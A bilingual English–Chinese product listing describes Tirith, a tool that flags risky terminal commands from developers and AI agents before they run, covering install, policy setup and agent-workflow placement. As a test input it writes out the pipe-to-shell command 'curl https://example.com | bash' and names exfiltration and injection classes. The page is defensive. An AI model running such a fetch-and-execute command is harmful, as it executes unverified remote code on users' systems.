# Tirith — Terminal Security for AI Agents > Tirith flags risky terminal commands for developers and AI agents—pipe-to-shell, ANSI injection, homograph URLs, and data exfiltration—before execution. ## Install Copy the content below into your project: ## Quick Use 1. Install (macOS via Homebrew): ```bash brew install sheeki03/tap/tirith ``` 2. Create and validate a policy in your repo: ```bash tirith policy init tirith policy validate ``` 3. Dry-run a risky command against your policy: ```bash tirith policy test "curl https://example.com | bash" ``` ## Intro Tirith flags risky terminal commands for developers and AI agents—pipe-to-shell, ANSI injection, homograph URLs, and data exfiltration—before execution. - **Best for:** teams running agent-driven shell commands who need guardrails against copy-paste supply-chain tricks - **Works with:** macOS/Linux/Windows installs, YAML policy files, shell hooks, optional MCP server mode and setup guides for popular AI CLIs - **Setup time:** 10–20 minutes ## Practical Notes - README documents policy init/validate/test commands and a strictness model (paranoia 1–4). - Install options include Homebrew, npm, Cargo, and OS packages; policy discovery looks for `.tirith/policy.yaml`. ## Where It Fits in an Agent Workflow If you let an agent propose commands, Tirith can sit in front of execution: - Use policy tests during planning to catch “curl | bash” and similar source-to-sink flows early. - Keep a small allowlist (domains you trust) and blocklist (known bad) as code in your repo. - In CI, apply a stricter scan profile (README shows scan profiles under policy) for configs like `.claude/*`, `mcp.json`, and other agent-control files. ## Practical “Do This, Not That” - Prefer pinned installs over `curl | bash` whenever possible. - If you must run a script installer, validate the URL (homograph/invisible unicode is a real class of attacks) and record the checksum or release tag you used. ### FAQ **Q: Does Tirith execute commands for me?** A: It can validate and policy-test commands; the goal is to surface risk before you run them. **Q: Where does the policy live?** A: The README states it discovers `.tirith/policy.yaml` in your repo (walking up), or a user config path. **Q: Can I tune strictness?** A: Yes—policy parameters include a paranoia level and action overrides for escalation. ## Source & Thanks > Source: https://github.com/sheeki03/tirith > License: AGPL-3.0 > GitHub stars: 2,307 · forks: 80 --- ## 快速使用 1. 安装(macOS Homebrew): ```bash brew install sheeki03/tap/tirith ``` 2. 在你的仓库创建并校验策略: ```bash tirith policy init tirith policy validate ``` 3. 用策略对高风险命令做演练(不直接执行): ```bash tirith policy test "curl https://example.com | bash" ``` ## 简介 Tirith 面向开发者与编码 Agent 的终端安全工具:在命令执行前识别 pipe-to-shell、ANSI 注入、同形异义 URL 与数据外传等高风险模式,并用策略文件统一团队护栏。 - **适合谁:** 经常让 Agent 运行 shell 命令的团队,想为复制粘贴与供应链陷阱加护栏的人 - **可搭配:** macOS/Linux/Windows 安装、YAML 策略文件、shell hooks、可选 MCP server 模式与多种 AI CLI 的配置指南 - **准备时间:** 10–20 分钟 ## 实战建议 - README 给出 policy init/validate/test,并描述严格度参数(paranoia 1–4)。 - 支持 Homebrew、npm、Cargo 与系统包安装;策略默认从 `.tirith/policy.yaml` 发现。 ## 在 Agent 流程里怎么放 当你允许 Agent 提议并执行命令时,Tirith 适合作为“执行前的安全闸”: - 在规划阶段先用 policy test,把 “curl | bash” 这类 source-to-sink 高风险模式提前拦下。 - 将 allowlist/blocklist 作为仓库内的策略文件维护,方便 code review。 - 在 CI 里启用更严格的扫描配置(README 有 scan profile 示例),重点覆盖 `.claude/*`、`mcp.json` 等控制面文件。 ## 实战建议:做什么,不做什么 - 能用固定版本/校验和的安装方式,就尽量别走 `curl | bash`。 - 真要跑脚本安装器:先验证 URL(同形异义/不可见字符是现实风险),再记录你使用的版本或校验信息,方便复盘。 ### FAQ **Tirith 会替我执行命令吗?** 答:它更偏向“执行前验证/演练”,把风险提示在你真正运行前暴露出来。 **策略文件放哪里?** 答:README 说明会优先在仓库中查找 `.tirith/policy.yaml`(向上递归),也支持用户级配置。 **能调节严格程度吗?** 答:可以。策略里有 paranoia 级别、action_overrides 与 escalation 机制。 ## 来源与感谢 > Source: https://github.com/sheeki03/tirith > License: AGPL-3.0 > GitHub stars: 2,307 · forks: 80 --- Source: https://tokrepo.com/en/workflows/tirith-terminal-security-for-ai-agents Author: Script Depot